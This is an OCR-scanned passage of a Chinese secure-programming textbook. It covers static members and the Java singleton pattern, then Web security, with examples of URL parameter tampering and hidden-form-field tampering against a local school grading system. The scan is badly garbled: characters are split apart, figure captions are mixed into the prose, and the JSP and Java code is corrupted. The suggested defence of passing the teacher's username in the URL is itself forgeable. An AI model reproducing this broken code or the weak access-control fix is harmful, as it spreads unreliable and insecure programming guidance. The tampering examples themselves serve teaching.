Customer cus2 = new Customer(); 


之 后 ,内 存 中 数据 如 图 7-3 所 示 。 
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account [= cusl cus2 Fe account 
password SN 7 password 
cname bankName cname 
图 7-3 


静态 成 员 从 属于 一 个 类 ,不 是 某 对 象 的 一 部 分 , 非 静态 成 员 可 以 直接 访问 类 中 静态 
的 成 员 , 但 是 静态 成 员 不 可 以 访问 非 静 态 成 员 。 
静态 成 员 的 优点 是 : 消除 传统 程序 设计 方法 中 的 全 局 变量 ,为 真正 实现 封装 性 提 


。 供 了 必要 手段 
“7.3.2 静态 成 员 需 要 考虑 的 安全 问题 


由 于 静态 成 员 的 共享 性 ,就 必须 考虑 其 数据 安全 。 除 了 上 一 节 讲 到 的 线程 安全 以 
外 ,还 必须 考虑 对 象 对 其 进行 访问 时 的 安全 性 。 主 要 要 注意 以 下 几 点 : 
(1) 静态 成 员 的 初始 化 操作 先 于 对 象 的 实例 化 而 进行 ,所 以 在 它们 的 初始 化 中 不 


要 启动 线程 ,以 免 造 成 数据 访问 的 问题 。 同 时 静态 成 员 的 初始 化 操作 中 也 不 应 该 有 依 


， 赖 关 系 ; 


(2) 不 用 静态 变量 保存 某 个 对 象 的 状态 ,而 应 该 保存 所 有 对 象 应 该 共有 的 状 
(3) 不 用 对 象 来 访问 静态 变量 ,而 用 类 名 来 访问 静态 变量 。 


让 


7.3.3 利用 单 例 提高 程序 性 能 


单 例 模式 适合 于 一 个 类 只 有 一 个 实例 的 情况 ,可 以 起 到 提高 性 能 的 效果 。 比 如 


Windows 中 的 任务 管理 器 ,一 旦 打开 如 果 再 次 打开 ,就 不 会 打开 新 窗口 ,又 如 打印 缓冲 


池 和 文件 系统 ,它们 都 是 单 例 的 例子 。 怎 样 保证 一 个 对 象 只 有 在 第 一 次 使 用 时 候 实例 
化 ,以 后 要 使 用 就 不 再 实例 化 ? 

单 例 模式 确保 某 一 个 类 只 有 一 个 实例 ,而 且 自 行 实例 化 并 向 整个 系统 提供 这 个 实 
例 , 这 个 类 称 为 单 例 类 , 它 提供 全 局 访问 的 方法 。 单 例 模式 的 要 点 有 3 个 : 

(1) 某 个 类 只 能 有 一 个 实例 ; 

(2) 它 必须 自行 创建 这 个 实例 ; 

(3) 它 必须 自行 向 整个 系统 提供 这 个 实例 。 

以 “Windows 任务 管理 器 "为 例 ,如 图 7-4 所 示 。 

当 打 开 任 务 管理 器 后 ,如 果 再 次 打开 任务 管理 器 ,就 使 用 前 面 已 经 打开 的 对 象 。 就 
可 以 用 单 例 模式 来 进行 模拟 。 

代码 如 下 : 


TaskManagerTest. java 


package prj07; 


class TaskManager 
{ 
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private static TaskManager tm = new TaskManager(); 
public static TaskManager getInstance() 
{ 

return tm; 


} 
private TaskManager( ) 


{ 


System. out. println(" 对 象 被 生成 "); 
} 
public void show() 
{ 


System. out. println(" 显 示 "); 


} 
} 
public class TaskManagerTest 
{ 


public static void main(String[ ] args) 

| 
TaskManager tml = TaskManager.getInstance(); 
tml. show( ); 
TaskManager tm2 = TaskManager. getInstance(); 
tm2. show( ); 


} 


运行 后 的 显示 效果 如 图 7-5 所 示 。 


ialy 
文件 于 ) 选项 必 ) 查看 以) 窗口 如 帮助 0 


应 用 程序 | 进程 | 性 能 | 联网 | 


到 字 static 圭 态 ) 就 能 创建 这 样 的 成 员 ， 正在 运行 
贺 chol, aoe - Wierosoft Word 正在 运行 


副 


结束 任务 到 ) | |_ 切 执 至 @) | 新 任务 四 .…. 


当然 这 只 有 在 确信 程序 不 再 需要 任何 多 于 一 个 的 实例 的 情况 下 。 通 过 单 例 模式 可 
以 做 到 : 
。 确保 一 个 类 只 有 一 个 实例 被 建立 ; 


本 鸭 件 安全 实现 一 安全 编程 技术 
Re 各 


。 提供 一 个 对 对 象 的 全 局 访问 指针 ,在 不 影响 单 例 类 的 客户 端的 情况 下 允许 将 来 
有 多 个 实例 ,等 等 。 
单 例 模式 在 其 他 场合 ,如 数据 库 连 接 池 、 共 享 对 象 方面 ,可 以 起 到 提高 系统 性 能 的 


| 作用 。 
- 


| 本 章 主要 介绍 面向 对 象 中 的 安全 编程 ,涉及 面向 对 象 .内 存 的 分 配 与 释放 、 对 象 序 
| 列 化 安全 、 静 态 成 员 安 全 等 ,最 后 用 单 例 模式 阐述 了 静态 成 员 对 提高 系统 性 能 所 作 的 
， 贡献 。 


练 “ 习 


. 写 一 段 静态 成 员 不 安全 的 代码 。 

. 对 第 1 题 提出 解决 方案 。 

. 怎样 获取 序列 化 对 象 中 的 字段 信息 ? 

.对 象 序列 化 过 程 中 ,怎样 保证 安全 ? 

. 在 C 和 Java 中 怎样 回收 内 存 ? 

. 单 例 模式 为 什么 能 提高 程序 性 能 ?有 何 劣 势 ? 
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第 章 


Web 编 程 安全 


Web 是 目前 比较 流行 的 软件 编程 方法 之 一 ,也 是 B/S 模式 的 一 种 实现 方式 ,由 于 
Web 编程 的 方法 和 传统 C/S 程序 的 不 相同 ,因此 ,Web 编程 中 的 安全 问题 也 具有 其 特 
殊 性 。 

本 章 主 要 针对 Web 编程 中 的 一 些 安全 问题 进行 讲解 。 首 先 讲解 了 Web 运行 的 原 
理 , 然 后 讲解 了 URL 操作 攻击 , 接 下 来 针对 Web 程序 的 特性 ,讲解 了 4 种 页 面 之 间 传 
递 状态 的 技术 ,并 比较 了 它们 的 安全 性 ,最 后 针对 两 种 常见 的 安全 问题 : 跨 站 脚本 和 
SQL 注入 进行 了 详细 叙述 。 

应 该 指出 的 是 ,本 章 所 列举 的 并 不 是 Web 编程 安全 的 全 部 内 容 , 只 是 讲述 了 一 些 
常见 的 安全 问题 及 其 解决 方法 。 在 实际 项 目 开发 中 ,读者 可 以 采取 相应 的 方法 来 解决 。 


8.1 Web 概述 


8.1.1 Web 运行 的 原理 


Web 原意 是 “蜘蛛 网 ”或 “网 ”。 在 互联 网 等 技术 领域 , 特 指 网 络 , 在 应 用 程序 领 
域 , 又 是 World Wide Web( 万 维 网 ) 的 简称 。 不 过 ,对 于 不 同 的 对 象 , 它 有 好 几 个 方面 
的 意思 : 

。 对 于 普通 用 户 来 说 ,Web 是 一 种 应 用 程序 的 使 用 环境 ; 

。 对 于 软件 (网 站 ) 的 制作 者 来 说 ,是 一 系列 技术 的 复合 总 称 ,如 网 站 的 用 户 界 

面 \ 后 台 程 序数 据 库 等 。 

本 章 主要 站 在 软件 的 制作 者 角度 来 讲解 Web。 实 际 上 ,Web 程序 在 架构 上 属于 
B/S( 浏 览 器 /服务 器 ) 模 式 。 随 着 Internet 技术 的 兴起 ,B/S 结构 成 为 对 C/S 结构 的 一 
种 改进 。 这 种 结构 有 如 下 特点 : 

。 程序 完全 放 在 应 用 服务 器 上 ,并 在 应 用 服务 器 上 运行 ,通过 应 用 服务 器 同 数据 

库 服务 器 进行 通信 ; 
。 客户 机 上 无 须 安 装 任何 客户 端 软件 ,系统 界面 通过 客户 端 浏览 器 展现 ,客户 端 
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只 需要 在 浏览 器 内 输入 URL; 
。 修改 了 应 用 系统 ,只 需要 维护 应 用 服务 器 。 
由 于 B/S 结构 的 优点 ,现在 的 网 络 应 用 系统 中 ,B/S 系统 占 绝对 主流 地 位 。 


全 | 提示 “不 过 ,B/S 并 不 是 C/S 的 替代 品 。B/S 结构 相 较 于 C/S 结构 ,也 存在 一 定 
的 劣势 ,B/S 的 界面 没有 C/S 友好 ,实时 性 不 如 C/S 等 。 


了 解 了 什么 是 Web 程序 ,再 来 深入 了 解 一 下 Web 技术 的 相关 特点 。 
在 Web 程序 结构 中 ,浏览 器 端 与 应 用 服务 器 端 采用 请 求 /响应 模式 进行 交互 ,如 


图 8-1 所 示 。 
2. 发 送 请 求 i ee] 
1. 用 户 输入 [二 一 =| 应 用 数据 库 
一 一 | 客户 党 上- 交加 
6 显示 5. 返回 响应 服务 器 王 4 返回 结果 【服务 器 


图 8-1 


过 程 描述 如 下 : 
| (1) 客户 端 (通常 是 浏览 器 ,如 IE、Firefox 等 ) 接 受用 户 的 输入 ,如 用 户 名 密码 、 查 
， 询 字符 中 等 ; 
| (2) 客户 端 向 应 用 服务 器 发 送 请 求 , 输 入 之 后 ,提交 ,客户 端 把 请 求 信息 (包含 表单 
中 的 输入 以 及 其 他 请 求 等 信息 ) 发 送 到 应 用 服务 器 端 ,客户 端 等 待 服务 器 端的 响应 ; 
(3) 数据 处 理 ,应 用 服务 器 端 使 用 某 种 脚本 语言 ,来 访问 数据 库 ,查询 数据 ,并 获得 
查询 结果 ; 
(4) 数据 库 向 应 用 服务 器 中 的 程序 返回 结果 ; 
(5) 发 送 响 应 ,应 用 服务 器 端 向 客户 端 发 送 响 应 信息 (一 般 是 动态 生成 的 HTML 
页 面 ); 
(6) 显示 ,由 用 户 的 浏览 器 解释 HTML 代码 ,呈现 用 户 界 面 。 


”8. 1.2 ”Web 编程 


| 可 以 说 ,不 同 的 Web 编程 语言 都 对 应 着 不 同 的 Web 编程 方式 ,目前 常见 的 应 用 于 
。 Web 的 编程 语言 主要 有 以 下 几 种 。 
| ee | 

CGI(Common Gateway Interface) 全 称 是 “公共 网 关 接 口 ”, 其 程序 须 运 行 在 服务 
| 器 端 。 该 技术 可 以 用 来 解释 处 理 来 自 Web 客户 端的 输入 信息 ,并 在 服务 器 进行 相应 的 
| 处 理 , 最 后 将 相应 的 结果 反馈 给 浏览 器 。CGI 技术 体系 的 核心 是 CGI 程序 ,负责 处 理 
| 客户 端的 请 求 。 早 期 有 很 多 Web 程序 用 CGI 编写 ,但 是 由 于 其 性 能 较 低 ( 如 对 多 用 户 
， 的 请 求 采用 多 进程 机 制 ) 和 编程 复杂 ,目前 使 用 较 少 。 
| 2. PHP 
| PHP(Hypertext Preprocessor) 是 一 种 可 肉 入 HTML、 可 在 服务 器 端 执 行 的 内 咀 
” 式 脚 本 语言 ,语言 的 风格 比较 类 似 于 C 语言 ,使 用 范围 比较 广泛 。 其 语法 混合 了 C、 
Java、Perl, 比 CGI 或 者 Perl 能 够 更 快速 地 执行 动态 网 页 。 PHP 执行 效率 比 CGI 要 高 
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许多 ; 另外 , 它 支持 几乎 所 有 流行 的 数据 库 以 及 操作 系统 。 

3. JSP 

JSP(Java Server Pages) 是 由 Sun 公司 提出 ,其 他 许多 公司 一 起 参与 建立 的 一 种 动 


态 网 页 技术 标准 。JSP 技术 在 传统 的 网 页 HTML 文件 (x* .htm x .htmDD) 中 嵌入 Java 


程序 段 (Scriptlet) Java 表达 式 (Expression) 或 者 JSP 标记 (tag) ,从 而 形成 JSP 文件 
(x% .jsp) ,在 服务 器 端 运行 。 和 PHP 一 样 ,JSP 开发 的 Web 应 用 也 是 跨 平台 的 ,另外 ， 
JSP 还 支持 自 定 义 标 签 。JSP 具备 了 Java 技术 面向 对 象 ,平台 无 关 性 且 安 全 可 靠 的 优 
点 ,值得 一 提 的 是 ,众多 大 公司 都 支持 JSP 技术 的 服务 器 ,如 IBM、Oracle 公司 等 ,使 得 
JSP 在 商业 应 用 的 开发 方面 成 为 一 种 流行 的 语言 。 

4. ASP 

ASP(Active Server Page) 意 为 “动态 服务 器 页 面 ", 是 微软 公司 开发 的 一 种 编程 规 
范 , 最 初 目 的 是 代替 CGI 脚本 ,可 以 运行 于 服务 器 端 , 与 数据 库 和 其 他 程序 进行 交互 ， 
可 以 包含 HTML 标记 、 文 本、 脚本 以 及 COM 组 件 等 。 由 于 其 编写 简便 ,快速 开发 支持 
较 好 ,在 中 小 型 Web 应 用 中 ,比较 流行 。 

5. JavaScript 

JavaScript 是 一 种 基于 对 象 和 事件 驱动 的 脚本 语言 , 主要 运行 于 客户 端 。 
JavaScript 编写 的 程序 在 运行 前 不 必 编 译 , 客户 端 浏览 器 可 以 直接 来 解释 执行 
JavaScript。 一 般 情况 下 ,一 些 不 用 和 服务 器 打交道 的 交互 (如 账号 是 否 为 空 ), 就 可 以 
直接 在 客户 端 进行 ,给 用 户 提供 了 一 个 较 好 的 体验 ,减轻 了 服务 器 的 负担 。 


8.2 ”避免 URL 操作 攻击 


8.2.1 URL 的 概念 及 其 工作 原理 


Web 上 有 很 多 资源 ,如 HTML 文档 图像、 视频 、 程 序 等 ,在 访问 时 ,它们 的 具体 位 


置 怎 样 确定 呢 ? 通常 是 利用 URL。 

统一 资源 定位 器 (Uniform Resoure Locator,URL) ,是 Internet 上 用 来 描述 信息 资 
源 的 字符 串 ,可 以 帮助 计算 机 来 定位 这 些 Web 上 可 用 资源 。 

以 下 是 一 个 典型 的 URL 例子 : 


http://localhost :8080/Prj08/index. jsp?username = guokehua 


可 以 看 出 ,URL 一 般 由 3 部 分 组 成 。 

访问 资源 的 命名 机 制 (协议 ): http, 实 际 上 还 有 可 能 是 ftp 等 。 
存放 资源 的 主机 名 : localhost:8080。 

资源 自身 的 名 称 ,由 路 径 表 示 : /Prj08/index. jsp。 

其 他 信息 ,如 查询 字符 串 等 : ? username 一 guokehua。 

另外 有 一 个 概念 ,叫做 统一 资源 标识 (Uniform Resource Identifier,URI) 。 在 网 络 
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领域 ,熟悉 URL 概念 的 人 比 熟悉 URI 的 要 多 ,实际 上 ,URL 是 URI 命名 机 制 的 一 个 


子 集 。 
< 另外 ,还 有 一 个 概念 是 统一 资源 名 称 (Uniform 
URL URN | Resource Name, URN): 也 用 来 标识 Internet 上 的 资 
源 ,但 是 通过 使 用 一 个 独立 于 位 置 的 名 称 来 实现 。 


URN 也 是 URI 的 一 个 子 集 。 三 者 关系 如 图 8-2 所 示 。 


”8.2.2 URL 操作 攻击 


URL 操作 攻击 的 原理 ,一 般 是 通过 URL 来 猜测 某 些 资源 的 存放 地 址 ,从 而 非法 
访问 受 保护 的 资源 。 

举 一 个 例子 ,假如 有 一 个 教学 管理 系统 ,教师 输入 自己 的 账号 ,密码 ,可 以 看 到 他 所 
教 的 班级 的 学 生 信息 。 

辕 于 篇 幅 , 这 里 不 给 出 代码 ,仅仅 给 出 代码 的 基本 思想 。 

系统 中 有 一 个 学 生 表 , 参 见 表 8-1。 


表 8-1 学 生 表 
学 号 (主键 ) 姓名 性 别 家 庭 住址 班级 


还 有 一 个 教师 表 , 参 见 表 8-2。 
表 8-2 教师 表 


账号 (主键 密码 姓名 班级 


系统 流程 如 下 : 

(1) 首先 呈现 给 教师 的 是 登录 页 面 ,如 http://localhost:8080/Prj08/login. jsp, 该 
页 面 代码 中 ,首先 显示 一 个 表单 ,如 图 8-3 所 示 。 

该 表单 将 用 户 的 账号 和 密码 提交 给 一 个 控制 器 ,控制 器 访问 数据 库 , 如 果 通 过 验 
证 , 则 将 用 户 信息 存放 在 session 内 , 跳 到 welcome 页 面 。 

(2) 登录 成 功 后 ,教师 会 看 到 如 图 8-4 所 示 的 welcome 界面 , http://localhost: 
8080/Prj08/welcome. jsp。 


请 您 登录 . 
输入 账号 :uckeha 人 欢迎 guokehua 登 录 ， 以 下 是 你 班 学 生 ， 
输入 密码 :ooos 起 多 
六 | 唐 晓 云 查看 

图 8-3 图 8-4 


该 页 面 中 ,首先 从 session 中 获取 登录 用 户 名 ,然后 结合 两 个 表 进 行 查询 ,得 到 班级 
学 生 姓名 ,在 列表 中 ,显示 了 该 教师 所 在 班级 的 学 生 ; 后 面 的 链接 负责 将 该 学 生 的 学 号 
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(3) 用 户 单 击 * 王 海 ” 后 面 的 “查看 ”链接 ,到 达 页 面 : http://localhost: 8080/ 
Prj08/display. jsp?stuno 一 0035 ,显示 效果 如 图 8-5 所 示 。 人 ! 

该 页 面 主要 是 根据 传 过 来 的 值 查询 数据 库 中 的 学 生 表 , 将 ”人 全 f/f 
信息 显示 。 表 面 上 看 上 去 ,该 程序 没有 任何 问题 。 和 | 

注意 ,前 面 的 步骤 中 , 单 击 * 王 海 " 右 边 的 * 查 看 ”链接 时 ,用 家 庭 住址 ; 上 海 
于 学 生 * 王 海 ”从 数据 库 获 取 数据 的 URL 为 : 图 8-5 


传 给 display. jsp。 


http://localhost:8080/Prj08/display. jsp?stuno = 0035 


因为 王 海 的 学 号 为 0035, 所 以 ,从 客户 端 源 代码 上 讲 ,“ 王 海 ” 右 边 的 “查看 ”链接 看 
起 来 是 这 样 的 : 


<a href = "http://localhost:8080/Prj08/display. jsp?stuno = 0035"> 查 看 </a> 


该 URL 非常 直观 ,可 以 从 中 看 到 是 获取 stuno 为 0035 的 数据 ,因此 ,给 了 攻击 者 
会 ,可 以 很 容易 尝试 将 如 下 URL 输入 到 地 址 栏 中 : 


http://localhost:8080/Prj08/display. jsp?stuno = 0001 


表示 命令 数据 库 查询 学 号 为 0001 的 学 生 信 息 ,当然 , 可 能 刚 开始 的 尝试 或 许 得 不 到 结 
果 ( 该 学 号 可 能 不 存在 ) ,但 是 经 过 足够 次 数 的 尝试 ,总 可 以 给 攻击 者 得 到 结果 的 机 会 。 
如 输入 : 


http://localhost:8080/Prj08/display. jsp?stuno = 0024 


得 到 的 内 容 如 图 8-6 所 示 。 


以 下 是 江 民 的 信息 ， 因为 “ 江 民 ”的 学 号 就 是 *0024”, 所 以 “ 江 民 ”的 信息 就 显示 
站 人 :中 并 了 出 来 。 这 里 就 造成 了 一 个 不 安全 的 现象 , 老师 可 以 查询 不 是 
性 别 ; 和信 

交 源 :出 [ 他 班级 上 学 生 的 信息 。 


更 有 甚 者 ,如 果 网 站 足够 不 安全 的 话 ,攻击 者 可 以 不 用 合 

录 , 直 接 输入 上 面 格式 的 URL( 如 http://localhost: 8080/ ， 
Prj08/display. jsp?stuno 一 0024) ,将 信息 显示 出 来 。 这 样 编写 导致 该 学 校 网 站 为 URL ， 
操作 攻击 淫 开 了 大 门 。 


8.2.3 解决 方法 


如 何 解决 以 上 URL 操作 攻击 ? 程序 员 在 编写 Web 应 用 的 时 候 , 可 以 从 以 下 方面 
加 以 注意 : 

(1) 为 了 避免 非 登 录用 户 进行 访问 ,对 于 每 一 个 只 有 登录 成 功 才 能 访问 的 页 面 ,应 
该 进行 session 的 检查 (session 检查 的 内 容 在 下 一 个 章节 提 到 ); 

(2) 为 限制 用 户 访问 未 被 授权 的 资源 ,可 在 查询 时 将 登录 用 户 的 用 户 名 也 考虑 进 
去 。 如 王 海 的 学 号 为 0035, 所 以 王 海 右边 的 “查看 "链接 可 以 设计 为 这 样 : 


图 8-6 
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<a href = "http://localhost:8080/Prj08/display. jsp?stuno = 0035&username = guokehua"> 查 
看 </a> 


这 样 ,用 于 学 生 王 海 从 数据 库 获取 数据 的 URL 为 : 


http://localhost:8080/Prj08/display. jsp?stuno = 0035&username = guokehua 


在 向 数据 库 查 询 时 ,就 可 以 首先 检查 guokehua 是 否 在 登录 状态 ,然后 根据 学 号 
(0035) 和 教师 用 户 名 (guokehua) 综 合 进行 查询 。 这 样 ,攻击 者 单独 输入 学 号 ,或 者 输 
入 学 号 和 未 登录 的 用 户 名 ,都 无 法 显示 结果 。 


8.3 页 面 状态 值 安全 


我 们 知道 ,HTTP 是 无 状态 的 协议 。Web 页 面 本 身 无 法 向 下 一 个 页 面 传递 信息 ， 
如 果 需 要 让 下 一 个 页 面 得 知 该 页 面 中 的 值 ,除非 通过 服务 器 。 因 此 ,Web 页 面 保持 状 
态 并 传递 给 其 他 页 面 ,是 一 个 重要 技术 。 

Web 页 面 之 间 传 递 数据 ,是 Web 程序 的 重要 功能 ,其 流程 如 图 8-7 所 示 。 


服务 器 其 过 程 如 下 : 
客户 端 页 面 1 | 发 送 guokehua 。 页 面 1 中 输入 数据 guokehua, 提交 给 服 
输入 :guokehua 务 器 端的 P2; 


响应 。 P2 获取 数据 ,响应 给 客户 端 。 
问题 的 关键 在 于 页 面 1 中 的 数据 如 何 提交 ， 

页 面 2 中 的 数据 如 何 获得 。 

图 8-7 举 一 个 简单 的 案例 : 页 面 1 中 定义 了 一 个 数 


客户 端 页 面 2 
显示 :guokehua 


值 变量 ,并 通过 计算 ,将 其 平方 的 值 显示 在 界面 上 ; 同时 页 面 1 中 有 一 个 链接 到 页 面 2， 
| 要 求 单 击 链接 ,在 页 面 2 中 显示 该 数字 的 立方 。 很 明显 ,该 应 用 中 ,页 面 2 必须 知道 页 


面 1 中 定义 的 那个 变量 。 
在 HTTP 协议 中 一 共有 4 种 方法 来 完成 这 件 事情 : 
(1) URL 传 值 ; 
(2) 表单 传 值 ; 
(3) Cookie 方法 ; 
(4) session 方法 。 
这 4 种 方法 各 有 特点 ,各 有 安全 性 ,本 节 将 对 其 进行 分 析 。 


”8.3.1 URL 传 什 


以 上 面 举 的 例子 为 例 ,可 以 将 页 面 1 中 的 变量 通过 URL 方法 传 给 页 面 2, 格 式 为 : 


页 面 2 路 径 ?参数 名 1 = 参数 值 1& 参数 名 2 = 参数 值 2&.… 
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本 |“ 


如 上 例子 ,可 以 写成 ， 
urlP1. jsp 
<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
< 和 
// 定 义 一 个 变量 : 


String str = "12"; 
int number = Integer.parseInt(str); 
先 > 
该 数字 的 平方 为 : <% = number * number $%><HR> 
<a href = "urlP2. jsp?number =<% = number $%>"> 到 达 urlP2 </a> 


运行 后 的 效果 如 图 8-8 所 示 。 
该 数字 的 平方 为 ，144 
到 达 urlP2 
图 8-8 


页 面 底部 显示 了 一 个 链接 : 到 达 urlP2, 其 链接 内 容 为 : 


http://localhost:8080/Prj08/8 - 3/urlP2. jsp?number = 12 


相当 于 提交 到 服务 器 的 urlP2. jsp, 并 给 其 一 个 参数 number, 值 为 12。 此 处 urlP2 
代码 为 ; 


urlP2. jsp 


<% @ page language = "java" import = "java.util. * "pageEncoding = "gb2312" %> 
<% 
// 获 得 number 
String str 
int number 


= request.getParameter("number" ); 
= Integer.parseInt(str); 


%> 
该 数字 的 立方 为 : <% = number x number x number $%><HR> 


单 击 urlP1. jsp 中 的 链接 ,到 达 urlP2. jsp, 效 果 如 图 8-9 所 示 。 

这 说 明 ,可 以 顺利 实现 值 的 传递 。 

但 是 该 方法 有 如 下 问题 

(1) 传输 的 数据 只 能 是 字符 串 , 对 数据 类 型 具有 一 定 限 制 ; 

(2) 传输 数据 的 值 会 在 浏览 器 地 址 栏 里 被 看 到 。 如 上 例子 , 当 单 击 了 链接 到 达 
urlP2.jsp, 浏 览 器 地 址 栏 上 的 地 址 变 如 图 8-10 所 示 。 


该 数字 的 立方 为 ，1728 同 http://locslhost:8080/Prj08/8-3/urlP2. jsp?number=12 
图 8-9 图 8-10 


number 的 值 可 以 被 人 看 到 。 从 保密 的 角度 讲 ,这 是 不 安全 的 。 特 别 是 安全 性 要 求 
很 严格 的 数据 (如 密码 ) ,不 应 该 用 URL 方法 来 传 值 。 


1 本 鸭 件 安全 实 规 一 安全 编程 技术 


但 是 ,URL 方法 并 不 是 一 无 是 处 ,由 于 其 简单 性 和 平台 支持 的 多 样 性 (没有 浏览 器 
不 支持 URL) ,很 多 程序 还 是 用 URL 传 值 比较 方便 ,如 图 8-11 以 下 是 数据 库 中 的 学 生 : 
所 示 的 界面 。 于 济 打 
国内 可 以 通过 能 接 来 删除 学 生 。 用 URL 方法 显得 简洁 方便 (不 齐 吕 到 
过 ,要 小 心 上 一 节 所 说 的 URL 操作 攻击 ) 。 


8.3.2 表单 传 值 


上 面 举 的 例子 ,通过 URL 方法 ,传递 的 数据 可 能 被 看 到 。 为 了 避免 这 个 问题 ,可 
以 用 表单 将 页 面 1 中 的 变量 传 给 页 面 2, 表 单 格式 为 : 


< form action = "页 面 2 路 径 "> 

<! -一 表单 中 的 其 他 表单 元 素 -一 > 

< input type = "submit" value = "到 达 formP2"> 
</form> 


如 上 例子 ,可 以 写成 : 


formP1. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
<% 
// 定 义 一 个 变量 : 
String str = "12"; 
int number = Integer.parseInt(str); 
%> 
该 数字 的 平方 为 : <% = number x number %><HR> 
< form action = "formP2. jsp"> 
< input type = "text" name = "number" value= "<% = number %>"> 
< input type = "submit" value = "到 达 formP2"> 
</form> 


运行 后 的 效果 如 图 8-12 所 示 。 


该 数字 的 平方 为 ，144 可 以 看 到 ,这 里 实际 上 是 将 number 的 值 放 入 表 

单元 素 ( 文 本 框 ), 传 到 下 一 个 页 面 (formP2)。 但 是 ， 

| number 的 值 在 界面 上 会 被 看 到 ,为 了 既 传 值 又 不 被 
图 8-12 看 到 ,可 以 使 用 隐藏 表单 。 


网 页 制作 中 ,input 有 一 个 type 二 "hidden" 的 选 
项 , 它 是 隐藏 在 网 页 中 的 一 个 表单 元 素 , 并 不 在 网 页 中 显示 出 来 ,但 是 可 以 设置 一 些 值 。 
于 是 formP1 代码 可 以 改 为 : 


formP1. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
<$% 

// 定 义 一 个 变量 : 

String str = "12"; 
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int number = Integer.parseInt(str); 
%> 
该 数字 的 平方 为 : <% = number * number %><HR> 
< form action = "formP2. jsp"> 
< input type = "hidden" name = "number" value= "<% = number $%>"> 
< input type = "submit" value= "到 达 p2"> 
</form> 


运行 后 的 效果 如 图 8-13 所 示 。 
Ej 
图 8-13 
传 的 值 就 被 隐藏 起 来 了 。 下 面 是 formP2 的 代码 : 


formP2. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
<% 
// 获 得 number 
String str = request. getParameter("number"); 
int number = Integer.parseInt(str); 
第 > 
该 数字 的 立方 为 : <% = number x number x number 名 >< HR> 


单 击 formP1. jsp 中 的 按钮 .到达 formP2 ,效果 如 图 8-14 所 示 。 
但 是 ,此 时 浏览 器 地 址 栏 上 的 地 址 如 图 8-15 所 示 。 


该 数字 的 立方 为 ，1728 同 http://localhost:8080/Prj08/8-3/ fornP2. jsp?namber=12 


图 8-14 图 8-15 


数据 还 是 能 够 被 看 到 。 
解决 该 问题 的 方法 是 将 form 的 action 属性 设置 为 post (默认 为 get)。 于 是 ， 
formP1 的 代码 变 为 : 


formP1. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 

< 和 
// 定 义 一 个 变量 : 
String str = "12"; 
int number = Integer.parseInt(str); 

%> 

该 数字 的 平方 为 : <% = number * number %><HR> 

< form action = "formP2. jsp” action = "post"> | 
< input type = "hidden" name = "number" value = "<% = number $%>"> L 
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< input type = "submit" value = "到 达 p2"> 
</form> 


再 单 击 , 在 formP2 中 正常 显示 结果 ,此 时 ,浏览 器 地 址 栏 上 的 URL 如 图 8-16 所 示 。 


周 http://localhost:8080/Prj08/8-3/ fornF2. jsp 


图 8-16 


这 说 明 , 可 以 顺利 实现 值 的 传递 ,并 且 无 法 看 到 传递 的 信息 。 

但 是 该 方法 有 如 下 问题 : 

。 同 URL 方法 类 似 ,该 方法 传输 的 数据 ,也 只 能 是 字符 串 , 对 数据 类 型 具有 一 定 限 制 ; 

。 传输 数据 的 值 虽然 可 以 保证 在 浏览 器 地 址 栏 内 不 被 看 到 ,但 是 在 客户 端 源 代 码 
里 面 也 会 被 看 到 。 如 上 例子 ,在 formP1.jsp 中 ,打开 其 源 代码 ,如 下 : 


formPl. jsp 客户 端 源 代码 


该 数字 的 平方 为 : 144<HR 
< form action = "formP2. jsp" method= "post"> 
< input type = "hidden" name = "number" value = "12"> 
< input type = "submit" value = "到 达 formP2"> 
</form> 


在 二 input type 一 "hidden"”name 一 "number”value 一 "12" 二 中 ,要 传递 的 number 
值 被 显示 出 来 了 。 因 此 ,从 保密 的 角度 讲 , 这 也 是 不 安全 的 。 特 别 是 秘密 性 要 求 很 严格 
的 数据 (如 密码 ) ,也 不 推荐 用 表单 方法 来 传 值 。 

同样 ,表单 传 值 方法 也 并 不 是 一 无 是 处 ,由 于 其 ”请 您 输入 张 将 的 语文 成 绩 ( 可 修改 )， 
简单 性 和 平台 支持 的 多 样 性 ,很 多 程序 还 是 用 表单 ” 输 和 成绩, 匣 有 
传 值 比较 方便 ,如 图 8-17 所 示 的 界面 。 

该 表单 中 ,将 成 绩 输 入 之 后 , 单 击 “修改 ”按钮 ， 
分 数 被 提交 到 服务 器 。 系 统 如 何 知道 该 分 数 是 张 海 的 语文 成 绩 呢 ? 换 名 话说 ,系统 如 
何 知道 要 修改 表 中 的 哪 一 行 呢 ? 因此 ,该 程序 可 以 将 张 海 的 学 号 (如 0015) 和 语文 课程 
的 编号 (如 YW) 放 入 隐藏 表单 元 素 ,代码 如 下 : 


图 8-17 


请 您 输入 张 海 的 语文 成 绩 (可 修改 ): 
<form action= "目标 页 面 路 径 " method = "post"> 
输入 成 绩 : < input type = "text" name = "score" > 
< input type = "hidden" name = "stuno" value= "0015" > 
< input type = "hidden" name = "courseno" value = "YH" > 
< input type= "submit" value= "修改 "> 
</form> 


这 样 ,目标 页 面 就 可 以 得 知 分 数 的 同时 .还 得 知 该 分 数 所 对 应 的 学 生 的 学 号 和 课程 
编号 。 

提示 表面 上 看 上 去 ,该 程序 没有 任何 问题 。 其 实 ,这 里 也 有 漏洞 。 该 隐藏 表单 
中 隐藏 的 内 容 非 常 直观 ,可 以 从 客户 端 源 代码 中 看 到 学 号 和 课程 编号 ,因此 ,给 了 攻击 
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者 机 会 ,攻击 者 可 以 在 客户 端 通过 修改 源 代码 来 修改 任意 学 生 的 成 绩 : 如 将 客户 端 源 
代码 改 为 : 


请 您 输入 张 海 的 语文 成 绩 ( 可 修改 ) : 
< form action = "目标 页 面 路 径 " method = "post"> 
输入 成 绩 : < input type = "text" name= "score" > 
< input type= "hidden" name = "stuno" value= "0016" > 
< input type = "hidden" name = "courseno" value = "YH" > 
< input type = "submit”value= "修改 "> 
</form> 


就 可 以 修改 0016 学 生 的 语文 成 绩 了 ! 同样 ,更 为 严重 的 问题 是 ,如 果 网 站 足够 不 
安全 的 话 , 攻 击 者 可 以 不 用 登录 ,随意 设计 表单 来 访问 你 的 页 面 。 

